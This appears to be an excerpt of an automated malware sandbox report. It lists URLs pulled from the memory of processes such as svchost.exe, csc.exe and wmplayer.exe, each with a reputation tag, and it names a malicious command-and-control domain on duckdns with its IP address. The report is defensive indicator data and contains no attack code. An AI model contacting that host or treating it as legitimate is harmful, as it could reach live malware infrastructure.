              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdRYqRX0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806050%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806040%Avira URL Cloudsafe
              http://crl.ver)0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf0%Avira URL Cloudsafe
              https://account.live.com/msangcwam0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd3wiK1y0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml0%Avira URL Cloudsafe
              https://account.live.com/Wizard/Password/Change?id=806010%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806010%Avira URL Cloudsafe
              https://g.live.com/odclientsettings/ProdV2-C:0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAAA0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806000%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp://sc0%Avira URL Cloudsafe
              https://g.live.com/odclientsettings/Prod-C:0%Avira URL Cloudsafe
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/trust/Issuef0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/trustn0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806050%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806030%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/02/sconnce0%Avira URL Cloudsafe
              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfs0%Avira URL Cloudsafe
              https://account.live.com/inlinesignup.aspx?iww=1&id=806040%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              windowsserverfebarch.duckdns.org
              45.128.223.185
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                Xerverfebarch.duckdns.orgtrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdferencesvchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsyVb/vlWAsvchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.misvchost.exe, 00000016.00000003.1501156499.00000127C5931000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhemasvchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://login.live.m/svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000016.00000003.1498513433.00000127C607D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1484910298.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000016.00000003.3306981164.00000127C590F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307382053.00000127C590F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/02/sccI=csvchost.exe, 00000016.00000003.3306229401.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307739912.00000127C5965000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.0.xssvchost.exe, 00000016.00000003.1492845140.00000127C592F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307576853.00000127C596F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://geoplugin.net/json.gp/Csvchost.exe, 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ngen.exe, 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, wmplayer.exe, 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdorgsvchost.exe, 00000016.00000003.1492845140.00000127C592F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuersvchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/inlinesignup.aspx?iww=1&id=80603ssuersvchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.w3.osvchost.exe, 00000016.00000003.1441392975.00000127C5102000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://login.microsoftonline.com/ppsecure/devicechangecredential.srfressvchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://Passport.NET/tbsvchost.exe, 00000016.00000003.3307925667.00000127C5076000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451985460.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465314672.00000127C5932000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000016.00000003.1451565806.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451565806.00000127C5954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465879513.00000127C592A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465290470.00000127C595D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451899387.00000127C595D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 00000016.00000003.1451565806.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451899387.00000127C595D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLisectAVT_2403002A_136.exe, 00000000.00000002.1359537990.0000021425801000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000016.00000003.1421113174.00000127C5927000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://Passport.NET/STS</ds:KeyName>&lt:KeyInfosvchost.exe, 00000016.00000003.1441392975.00000127C5102000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 00000016.00000003.1451872925.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJjT99GvGMUsvchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdVyqsvchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://signup.live.com/signup.aspxsvchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420083064.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://Passport.NET/tb_svchost.exe, 00000016.00000002.3308848752.00000127C50B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3309635765.00000127C60E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3309611722.00000127C60D1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~svchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdRYqRXsvchost.exe, 00000016.00000003.1493011495.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000016.00000003.3307665855.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306823290.00000127C594A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306202897.00000127C5949000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306846415.00000127C594C000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://account.live.com/msangcwamsvchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420714728.00000127C5957000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.ver)svchost.exe, 00000002.00000002.2966266630.00000250E6800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308848752.00000127C50D9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoasvchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://passport.net/tbsvchost.exe, 00000016.00000002.3309287313.00000127C605B000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://upx.sf.netAmcache.hve.16.drfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuesvchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1479614027.00000127C5953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465314672.00000127C592D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1488317701.00000127C5959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451985460.00000127C595A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1479614027.00000127C5959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451985460.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1465314672.00000127C5932000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1488411468.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1479992974.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1488317701.00000127C5953000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd3wiK1ysvchost.exe, 00000016.00000003.1493011495.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gpcsc.exe, ngen.exe, wmplayer.exefalse
                  • URL Reputation: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxmlsvchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAAAsvchost.exe, 00000016.00000003.1464651833.00000127C5955000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://g.live.com/odclientsettings/Prod-C:qmgr.db.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp://scsvchost.exe, 00000016.00000003.1492845140.00000127C592F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000002.00000003.1335457695.00000250E6A00000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcuritysvchost.exe, 00000016.00000003.1465262209.00000127C5952000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000016.00000002.3308906391.00000127C50E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307576853.00000127C596F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 00000016.00000003.3306981164.00000127C590F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307382053.00000127C590F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuefsvchost.exe, 00000016.00000003.1492911257.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307576853.00000127C596F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1503199338.00000127C596B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/trustnsvchost.exe, 00000016.00000003.3306499705.00000127C593A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307643246.00000127C5943000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306420605.00000127C5937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306773985.00000127C5942000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306680570.00000127C5941000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfssvchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000016.00000003.1479153178.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1451899387.00000127C595D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/sconncesvchost.exe, 00000016.00000003.3306499705.00000127C593A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307643246.00000127C5943000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306420605.00000127C5937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306773985.00000127C5942000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306680570.00000127C5941000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3306577021.00000127C593D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  45.128.223.185
